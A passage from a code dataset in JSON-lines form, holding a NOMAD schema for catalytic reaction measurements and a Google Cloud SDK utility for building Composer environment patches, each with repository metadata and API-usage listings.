{var} over {domain} of {em} at {res} for {len(error_years)}\\n{sorted(error_years)}\"\n )\n", "repo_name": "henryaddison/mlde-data", "sub_path": "src/mlde_data/bin/variable.py", "file_name": "variable.py", "file_ext": "py", "file_size_in_byte": 17908, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 34, "usage_type": "attribute"}, {"api_name": "typer.Typer", "line_number": 36, "usage_type": "call"}, {"api_name": "options.CollectionOption.cpm", "line_number": 46, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 46, "usage_type": "name"}, {"api_name": "options.CollectionOption.gcm", "line_number": 48, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 48, "usage_type": "name"}, {"api_name": "options.CollectionOption.cpm", "line_number": 54, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 54, "usage_type": "name"}, {"api_name": "options.CollectionOption.gcm", "line_number": 56, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 56, "usage_type": "name"}, {"api_name": "options.CollectionOption.cpm", "line_number": 78, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 78, "usage_type": "name"}, {"api_name": "options.CollectionOption.gcm", "line_number": 80, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 80, "usage_type": "name"}, {"api_name": "moose.raw_nc_filepath", "line_number": 91, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 101, "usage_type": "call"}, {"api_name": "moose.VARIABLE_CODES", "line_number": 103, "usage_type": "name"}, {"api_name": "moose.VARIABLE_CODES", "line_number": 105, "usage_type": "name"}, {"api_name": "moose.VARIABLE_CODES", "line_number": 109, "usage_type": "name"}, {"api_name": "moose.remove_forecast", "line_number": 116, "usage_type": "call"}, {"api_name": "moose.remove_pressure", "line_number": 118, "usage_type": "call"}, {"api_name": "mlde_utils.VariableMetadata", "line_number": 123, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 133, "usage_type": "call"}, {"api_name": "moose.remove_pressure", "line_number": 135, "usage_type": "call"}, {"api_name": "xarray.combine_by_coords", "line_number": 142, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 157, "usage_type": "name"}, {"api_name": "options.DomainOption", "line_number": 160, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 157, "usage_type": "call"}, {"api_name": "typer.Option", "line_number": 158, "usage_type": "call"}, {"api_name": "options.DomainOption.london", "line_number": 160, "usage_type": "attribute"}, {"api_name": "typer.Option", "line_number": 162, "usage_type": "call"}, {"api_name": "typer.Option", "line_number": 165, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path", "line_number": 182, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 182, "usage_type": "call"}, {"api_name": "options.CollectionOption", "line_number": 184, "usage_type": "call"}, {"api_name": "preprocessing.sum.Sum", 
"line_number": 203, "usage_type": "call"}, {"api_name": "preprocessing.diff.Diff", "line_number": 211, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "preprocessing.remapcon.Remapcon", "line_number": 231, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 235, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 239, "usage_type": "call"}, {"api_name": "preprocessing.coarsen.Coarsen", "line_number": 243, "usage_type": "call"}, {"api_name": "preprocessing.shift_lon_break.ShiftLonBreak", "line_number": 245, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 248, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 249, "usage_type": "call"}, {"api_name": "os.path", "line_number": 249, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 250, "usage_type": "call"}, {"api_name": "os.path", "line_number": 250, "usage_type": "attribute"}, {"api_name": "preprocessing.regrid.Regrid", "line_number": 258, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 262, "usage_type": "call"}, {"api_name": "preprocessing.vorticity.Vorticity", "line_number": 263, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 265, "usage_type": "call"}, {"api_name": "preprocessing.select_domain.SelectDomain", "line_number": 266, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 268, "usage_type": "call"}, {"api_name": "preprocessing.constrain.Constrain", "line_number": 269, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 271, "usage_type": "call"}, {"api_name": "mlde_utils.VariableMetadata", "line_number": 282, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 295, "usage_type": "call"}, {"api_name": "os.path", "line_number": 295, "usage_type": "attribute"}, {"api_name": "yaml.dump", "line_number": 297, "usage_type": "call"}, {"api_name": "codetiming.Timer", "line_number": 155, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 302, "usage_type": "call"}, {"api_name": "options.DomainOption", "line_number": 316, "usage_type": "name"}, {"api_name": "options.CollectionOption", "line_number": 317, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 312, "usage_type": "call"}, {"api_name": "typer.Option", "line_number": 313, "usage_type": "call"}, {"api_name": "typer.Option", "line_number": 314, "usage_type": "call"}, {"api_name": "options.DomainOption.london", "line_number": 316, "usage_type": "attribute"}, {"api_name": "typer.Option", "line_number": 317, "usage_type": "call"}, {"api_name": "typer.Option", "line_number": 318, "usage_type": "call"}, {"api_name": "moose.processed_nc_filepath", "line_number": 322, "usage_type": "call"}, {"api_name": "moose.processed_nc_filepath", "line_number": 331, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 343, "usage_type": "call"}, {"api_name": "codetiming.Timer", "line_number": 310, "usage_type": "call"}, {"api_name": "typer.Argument", "line_number": 354, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 437, "usage_type": "call"}, {"api_name": 
"sys.stdout", "line_number": 437, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 443, "usage_type": "call"}, {"api_name": "mlde_utils.VariableMetadata", "line_number": 445, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 446, "usage_type": "call"}, {"api_name": "xarray.load_dataset", "line_number": 455, "usage_type": "call"}, {"api_name": "re.match", "line_number": 476, "usage_type": "call"}, {"api_name": "re.match", "line_number": 494, "usage_type": "call"}]} +{"seq_id": "6323925346", "text": "import numpy as np\nimport os\n\nfrom nomad.metainfo import (Quantity, SubSection, Section)\nfrom nomad.datamodel.data import ArchiveSection\n\nfrom .. import MeasurementOnSample\n\n\nclass Reactant(ArchiveSection):\n m_def = Section(label_quantity='name')\n name = Quantity(type=str, a_eln=dict(component='StringEditQuantity'))\n\n amount = Quantity(type=np.dtype(np.float64), shape=['*'])\n\n\nclass Feed(ArchiveSection):\n m_def = Section(a_plot=[\n {\n \"label\": \"Feed\", 'x': 'runs', 'y': ['reactants/:/amount'],\n 'layout': {\"showlegend\": True,\n 'yaxis': {\n \"fixedrange\": False}, 'xaxis': {\n \"fixedrange\": False}}, \"config\": {\n \"editable\": True, \"scrollZoom\": True}}])\n flow_volume = Quantity(\n type=np.dtype(\n np.float64), shape=['*'], unit='ml/minute')\n runs = Quantity(type=np.dtype(np.float64), shape=['*'])\n\n reactants = SubSection(section_def=Reactant, repeats=True)\n\n\nclass Product(ArchiveSection):\n\n m_def = Section(label_quantity='name')\n name = Quantity(type=str, a_eln=dict(component='StringEditQuantity'))\n\n exchange = Quantity(type=np.dtype(np.float64), shape=['*'])\n selectivity = Quantity(type=np.dtype(np.float64), shape=['*'])\n relative_rate = Quantity(type=np.dtype(np.float64), shape=['*'])\n absolute_rate = Quantity(type=np.dtype(np.float64), shape=['*'])\n\n\nclass CatalyticReactionData(ArchiveSection):\n m_def = Section(a_plot=[\n {\n \"label\": \"Relative exchange rate\",\n 'x': 'runs',\n 'y': 'products/:/relative_rate',\n 'layout': {\"showlegend\": True,\n 'yaxis': {\n \"fixedrange\": False}, 'xaxis': {\n \"fixedrange\": False}}, \"config\": {\n \"editable\": True, \"scrollZoom\": True}},\n {\n \"label\": \"Selectivity\",\n 'x': 'runs',\n 'y': ['c_balance', 'products/:/selectivity'],\n 'layout': {\"showlegend\": True,\n 'yaxis': {\n \"fixedrange\": False}, 'xaxis': {\n \"fixedrange\": False}}, \"config\": {\n \"editable\": True, \"scrollZoom\": True}},\n {\n \"label\": \"Exchange \",\n 'x': 'runs',\n 'y': 'products/:/exchange',\n 'layout': {\"showlegend\": True,\n 'yaxis': {\n \"fixedrange\": False}, 'xaxis': {\n \"fixedrange\": False}}, \"config\": {\n \"editable\": True, \"scrollZoom\": True}}\n ]\n )\n\n temperature = Quantity(\n type=np.dtype(\n np.float64), shape=['*'], unit='°C')\n\n c_balance = Quantity(\n type=np.dtype(\n np.float64), shape=['*'])\n\n runs = Quantity(type=np.dtype(np.float64), shape=['*'])\n\n products = SubSection(section_def=Product, repeats=True)\n\n\nclass CatalyticReaction(MeasurementOnSample):\n\n reaction = Quantity(type=str, a_eln=dict(component='StringEditQuantity'))\n\n data_file = Quantity(\n type=str,\n a_eln=dict(component='FileEditQuantity'),\n a_browser=dict(adaptor='RawFileAdaptor'))\n\n feed = SubSection(section_def=Feed)\n data = SubSection(section_def=CatalyticReactionData)\n\n def normalize(self, archive, logger):\n super(CatalyticReaction, self).normalize(archive, logger)\n self.method = \"Catalytic Reaction\"\n\n if not self.data_file or os.path.splitext(\n 
self.data_file)[-1] != \".csv\":\n return\n\n with archive.m_context.raw_file(self.data_file) as f:\n import pandas as pd\n data = pd.read_csv(f.name).dropna(axis=1, how='all')\n feed = Feed()\n cat_data = CatalyticReactionData()\n reactants = []\n products = []\n number_of_runs = 0\n for col in data.columns:\n\n if len(data[col]) < 1:\n continue\n col_split = col.split(\" \")\n if len(col_split) < 2:\n continue\n\n if len(data[col]) > number_of_runs:\n number_of_runs = len(data[col])\n\n if col_split[0] == \"x\":\n reactant = Reactant(name=col_split[1],\n amount=data[col])\n reactants.append(reactant)\n if col_split[0] == \"temperature\":\n cat_data.temperature = data[col]\n\n if col_split[0] == \"C-balance\":\n cat_data.c_balance = data[col]\n\n if col_split[0] == \"GHSV\":\n feed.flow_volume = data[col]\n\n if len(col_split) < 3 or col_split[2] != '(%)':\n continue\n\n product = Product(name=col_split[1])\n for i, p in enumerate(products):\n if p.name == col_split[1]:\n product = products.pop(i)\n break\n\n products.append(product)\n\n if col_split[0] == \"x_p\":\n product.exchange = data[col]\n\n if col_split[0] == \"S_p\":\n product.selectivity = data[col]\n\n if col_split[0] == \"x_r\":\n product.relative_rate = data[col]\n\n if col_split[0] == \"r\":\n product.absolute_rate = data[col]\n\n for p in products:\n if p.exchange is None or len(p.exchange) == 0:\n p.exchange = number_of_runs * [0]\n if p.selectivity is None or len(p.selectivity) == 0:\n p.selectivity = number_of_runs * [0]\n if p.relative_rate is None or len(p.relative_rate) == 0:\n p.relative_rate = number_of_runs * [0]\n if p.absolute_rate is None or len(p.absolute_rate) == 0:\n p.absolute_rate = number_of_runs * [0]\n\n feed.reactants = reactants\n feed.runs = np.linspace(0, number_of_runs - 1, number_of_runs)\n cat_data.products = products\n cat_data.runs = np.linspace(0, number_of_runs - 1, number_of_runs)\n\n self.feed = feed\n self.data = cat_data\n", "repo_name": "RoteKekse/nomad-baseclasses", "sub_path": "baseclasses/heterogeneous_catalysis/catalytic_measurement.py", "file_name": "catalytic_measurement.py", "file_ext": "py", "file_size_in_byte": 6111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "nomad.datamodel.data.ArchiveSection", "line_number": 10, "usage_type": "name"}, {"api_name": "nomad.metainfo.Section", "line_number": 11, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 12, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 14, "usage_type": "attribute"}, {"api_name": "nomad.datamodel.data.ArchiveSection", "line_number": 17, "usage_type": "name"}, {"api_name": "nomad.metainfo.Section", "line_number": 18, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 28, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 29, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.SubSection", "line_number": 31, "usage_type": "call"}, {"api_name": "nomad.datamodel.data.ArchiveSection", "line_number": 
34, "usage_type": "name"}, {"api_name": "nomad.metainfo.Section", "line_number": 36, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 37, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 39, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 40, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 41, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 42, "usage_type": "attribute"}, {"api_name": "nomad.datamodel.data.ArchiveSection", "line_number": 45, "usage_type": "name"}, {"api_name": "nomad.metainfo.Section", "line_number": 46, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 79, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 83, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 85, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.SubSection", "line_number": 87, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 92, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 94, "usage_type": "call"}, {"api_name": "nomad.metainfo.SubSection", "line_number": 99, "usage_type": "call"}, {"api_name": "nomad.metainfo.SubSection", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 178, "usage_type": "call"}]} +{"seq_id": "5288966607", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.composer import environments_util as environments_api_util\nfrom googlecloudsdk.api_lib.composer import operations_util as operations_api_util\nfrom googlecloudsdk.api_lib.composer import util as api_util\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.command_lib.composer import util as command_util\nfrom googlecloudsdk.core import log\nimport six\n\n\ndef Patch(env_resource,\n field_mask,\n patch,\n is_async,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Patches an Environment, optionally waiting for the operation to complete.\n\n This function is intended to perform the common work of an 
Environment\n patching command's Run method. That is, calling the patch API method and\n waiting for the result or immediately returning the Operation.\n\n Args:\n env_resource: googlecloudsdk.core.resources.Resource, Resource representing\n the Environment to be patched\n field_mask: str, a field mask string containing comma-separated paths to be\n patched\n patch: Environment, a patch Environment containing updated values to apply\n is_async: bool, whether or not to perform the patch asynchronously\n release_track: base.ReleaseTrack, the release track of command. Will dictate\n which Composer client library will be used.\n\n Returns:\n an Operation corresponding to the Patch call if `is_async` is True;\n otherwise None is returned after the operation is complete\n\n Raises:\n command_util.Error: if `is_async` is False and the operation encounters\n an error\n \"\"\"\n operation = environments_api_util.Patch(\n env_resource, patch, field_mask, release_track=release_track)\n details = 'with operation [{0}]'.format(operation.name)\n if is_async:\n log.UpdatedResource(\n env_resource.RelativeName(),\n kind='environment',\n is_async=True,\n details=details)\n return operation\n\n try:\n operations_api_util.WaitForOperation(\n operation,\n 'Waiting for [{}] to be updated with [{}]'.format(\n env_resource.RelativeName(), operation.name),\n release_track=release_track)\n except command_util.Error as e:\n raise command_util.Error('Error updating [{}]: {}'.format(\n env_resource.RelativeName(), six.text_type(e)))\n\n\ndef ConstructPatch(env_ref=None,\n node_count=None,\n update_pypi_packages_from_file=None,\n clear_pypi_packages=None,\n remove_pypi_packages=None,\n update_pypi_packages=None,\n clear_labels=None,\n remove_labels=None,\n update_labels=None,\n clear_airflow_configs=None,\n remove_airflow_configs=None,\n update_airflow_configs=None,\n clear_env_variables=None,\n remove_env_variables=None,\n update_env_variables=None,\n update_image_version=None,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch.\n\n Args:\n env_ref: resource argument, Environment resource argument for environment\n being updated.\n node_count: int, the desired node count\n update_pypi_packages_from_file: str, path to local requirements file\n containing desired pypi dependencies.\n clear_pypi_packages: bool, whether to uninstall all PyPI packages.\n remove_pypi_packages: iterable(string), Iterable of PyPI packages to\n uninstall.\n update_pypi_packages: {string: string}, dict mapping PyPI package name to\n extras and version specifier.\n clear_labels: bool, whether to clear the labels dictionary.\n remove_labels: iterable(string), Iterable of label names to remove.\n update_labels: {string: string}, dict of label names and values to set.\n clear_airflow_configs: bool, whether to clear the Airflow configs\n dictionary.\n remove_airflow_configs: iterable(string), Iterable of Airflow config\n property names to remove.\n update_airflow_configs: {string: string}, dict of Airflow config property\n names and values to set.\n clear_env_variables: bool, whether to clear the environment variables\n dictionary.\n remove_env_variables: iterable(string), Iterable of environment variables\n to remove.\n update_env_variables: {string: string}, dict of environment variable\n names and values to set.\n update_image_version: string, image version to use for environment upgrade\n release_track: base.ReleaseTrack, the release track of command. 
Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n\n Raises:\n command_util.Error: if no update type is specified\n \"\"\"\n if node_count:\n return _ConstructNodeCountPatch(node_count, release_track=release_track)\n if update_pypi_packages_from_file:\n return _ConstructPyPiPackagesPatch(\n True, [],\n command_util.ParseRequirementsFile(update_pypi_packages_from_file),\n release_track=release_track)\n if clear_pypi_packages or remove_pypi_packages or update_pypi_packages:\n return _ConstructPyPiPackagesPatch(\n clear_pypi_packages,\n remove_pypi_packages,\n update_pypi_packages,\n release_track=release_track)\n if clear_labels or remove_labels or update_labels:\n return _ConstructLabelsPatch(\n clear_labels, remove_labels, update_labels, release_track=release_track)\n if (clear_airflow_configs or remove_airflow_configs or\n update_airflow_configs):\n return _ConstructAirflowConfigsPatch(\n clear_airflow_configs,\n remove_airflow_configs,\n update_airflow_configs,\n release_track=release_track)\n if clear_env_variables or remove_env_variables or update_env_variables:\n return _ConstructEnvVariablesPatch(\n env_ref,\n clear_env_variables,\n remove_env_variables,\n update_env_variables,\n release_track=release_track)\n if update_image_version:\n return _ConstructImageVersionPatch(\n update_image_version, release_track=release_track)\n raise command_util.Error(\n 'Cannot update Environment with no update type specified.')\n\n\ndef _ConstructNodeCountPatch(node_count, release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch for node count.\n\n Args:\n node_count: int, the desired node count\n release_track: base.ReleaseTrack, the release track of command. Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n \"\"\"\n messages = api_util.GetMessagesModule(release_track=release_track)\n config = messages.EnvironmentConfig(nodeCount=node_count)\n return 'config.node_count', messages.Environment(config=config)\n\n\ndef _ConstructPyPiPackagesPatch(clear_pypi_packages,\n remove_pypi_packages,\n update_pypi_packages,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch for partially updating PyPI packages.\n\n Args:\n clear_pypi_packages: bool, whether to clear the PyPI packages dictionary.\n remove_pypi_packages: iterable(string), Iterable of PyPI package names to\n remove.\n update_pypi_packages: {string: string}, dict mapping PyPI package name\n to optional extras and version specifier.\n release_track: base.ReleaseTrack, the release track of command. 
Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n \"\"\"\n messages = api_util.GetMessagesModule(release_track=release_track)\n env_cls = messages.Environment\n pypi_packages_cls = (messages.SoftwareConfig.PypiPackagesValue)\n entry_cls = pypi_packages_cls.AdditionalProperty\n\n def _BuildEnv(entries):\n software_config = messages.SoftwareConfig(\n pypiPackages=pypi_packages_cls(additionalProperties=entries))\n config = messages.EnvironmentConfig(softwareConfig=software_config)\n return env_cls(config=config)\n\n return command_util.BuildPartialUpdate(\n clear_pypi_packages, remove_pypi_packages, update_pypi_packages,\n 'config.software_config.pypi_packages', entry_cls, _BuildEnv)\n\n\ndef _ConstructLabelsPatch(clear_labels,\n remove_labels,\n update_labels,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch for updating labels.\n\n Args:\n clear_labels: bool, whether to clear the labels dictionary.\n remove_labels: iterable(string), Iterable of label names to remove.\n update_labels: {string: string}, dict of label names and values to set.\n release_track: base.ReleaseTrack, the release track of command. Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n \"\"\"\n messages = api_util.GetMessagesModule(release_track=release_track)\n env_cls = messages.Environment\n entry_cls = env_cls.LabelsValue.AdditionalProperty\n\n def _BuildEnv(entries):\n return env_cls(labels=env_cls.LabelsValue(additionalProperties=entries))\n\n return command_util.BuildPartialUpdate(clear_labels, remove_labels,\n update_labels, 'labels', entry_cls,\n _BuildEnv)\n\n\ndef _ConstructAirflowConfigsPatch(clear_airflow_configs,\n remove_airflow_configs,\n update_airflow_configs,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch for updating Airflow configs.\n\n Args:\n clear_airflow_configs: bool, whether to clear the Airflow configs\n dictionary.\n remove_airflow_configs: iterable(string), Iterable of Airflow config\n property names to remove.\n update_airflow_configs: {string: string}, dict of Airflow config property\n names and values to set.\n release_track: base.ReleaseTrack, the release track of command. 
Will dictate\n        which Composer client library will be used.\n\n  Returns:\n    (str, Environment), the field mask and environment to use for update.\n  \"\"\"\n  messages = api_util.GetMessagesModule(release_track=release_track)\n  env_cls = messages.Environment\n  airflow_config_overrides_cls = (\n      messages.SoftwareConfig.AirflowConfigOverridesValue)\n  entry_cls = airflow_config_overrides_cls.AdditionalProperty\n\n  def _BuildEnv(entries):\n    software_config = messages.SoftwareConfig(\n        airflowConfigOverrides=airflow_config_overrides_cls(\n            additionalProperties=entries))\n    config = messages.EnvironmentConfig(softwareConfig=software_config)\n    return env_cls(config=config)\n\n  return command_util.BuildPartialUpdate(\n      clear_airflow_configs, remove_airflow_configs, update_airflow_configs,\n      'config.software_config.airflow_config_overrides', entry_cls, _BuildEnv)\n\n\ndef _ConstructEnvVariablesPatch(env_ref,\n                                clear_env_variables,\n                                remove_env_variables,\n                                update_env_variables,\n                                release_track=base.ReleaseTrack.GA):\n  \"\"\"Constructs an environment patch for updating environment variables.\n\n  Note that environment variable updates do not support partial update masks\n  unlike other map updates due to comments in (b/78298321). For this reason, we\n  need to retrieve the Environment, apply an update on EnvVariable dictionary,\n  and patch the entire dictionary. The potential race condition here\n  (environment variables being updated between when we retrieve them and when we\n  send patch request) is not a concern since environment variable updates take\n  5 mins to complete, and environments cannot be updated while already in the\n  updating state.\n\n  Args:\n    env_ref: resource argument, Environment resource argument for environment\n      being updated.\n    clear_env_variables: bool, whether to clear the environment variables\n      dictionary.\n    remove_env_variables: iterable(string), Iterable of environment variable\n      names to remove.\n    update_env_variables: {string: string}, dict of environment variable names\n      and values to set.\n    release_track: base.ReleaseTrack, the release track of command. Will dictate\n      which Composer client library will be used.\n\n  Returns:\n    (str, Environment), the field mask and environment to use for update.\n  \"\"\"\n  env_obj = environments_api_util.Get(env_ref, release_track=release_track)\n  initial_env_var_value = env_obj.config.softwareConfig.envVariables\n  initial_env_var_list = (\n      initial_env_var_value.additionalProperties\n      if initial_env_var_value else [])\n\n  messages = api_util.GetMessagesModule(release_track=release_track)\n  env_cls = messages.Environment\n  env_variables_cls = messages.SoftwareConfig.EnvVariablesValue\n  entry_cls = env_variables_cls.AdditionalProperty\n\n  def _BuildEnv(entries):\n    software_config = messages.SoftwareConfig(\n        envVariables=env_variables_cls(additionalProperties=entries))\n    config = messages.EnvironmentConfig(softwareConfig=software_config)\n    return env_cls(config=config)\n\n  return ('config.software_config.env_variables',\n          command_util.BuildFullMapUpdate(\n              clear_env_variables, remove_env_variables, update_env_variables,\n              initial_env_var_list, entry_cls, _BuildEnv))\n\n\ndef _ConstructImageVersionPatch(update_image_version,\n                                release_track=base.ReleaseTrack.GA):\n  \"\"\"Constructs an environment patch for environment image version.\n\n  Args:\n    update_image_version: string, the target image version.\n    release_track: base.ReleaseTrack, the release track of command. 
Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n \"\"\"\n messages = api_util.GetMessagesModule(release_track=release_track)\n software_config = messages.SoftwareConfig(imageVersion=update_image_version)\n config = messages.EnvironmentConfig(softwareConfig=software_config)\n\n return 'config.software_config.image_version', messages.Environment(\n config=config)\n", "repo_name": "egzonarexhepi/mathpixlatexconverter", "sub_path": "frontend/matt12345/google-cloud-sdk/lib/googlecloudsdk/command_lib/composer/environment_patch_util.py", "file_name": "environment_patch_util.py", "file_ext": "py", "file_size_in_byte": 14495, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 18, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 18, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.environments_util.Patch", "line_number": 43, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.environments_util", "line_number": 43, "usage_type": "name"}, {"api_name": "googlecloudsdk.core.log.UpdatedResource", "line_number": 47, "usage_type": "call"}, {"api_name": "googlecloudsdk.core.log", "line_number": 47, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.operations_util.WaitForOperation", "line_number": 55, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.operations_util", "line_number": 55, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.Error", "line_number": 60, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 60, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.Error", "line_number": 61, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 61, "usage_type": "name"}, {"api_name": "six.text_type", "line_number": 62, "usage_type": "call"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 81, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 81, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.ParseRequirementsFile", "line_number": 125, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 125, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.Error", "line_number": 153, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 153, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 157, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 157, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 168, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 168, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 176, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 176, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 191, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 191, 
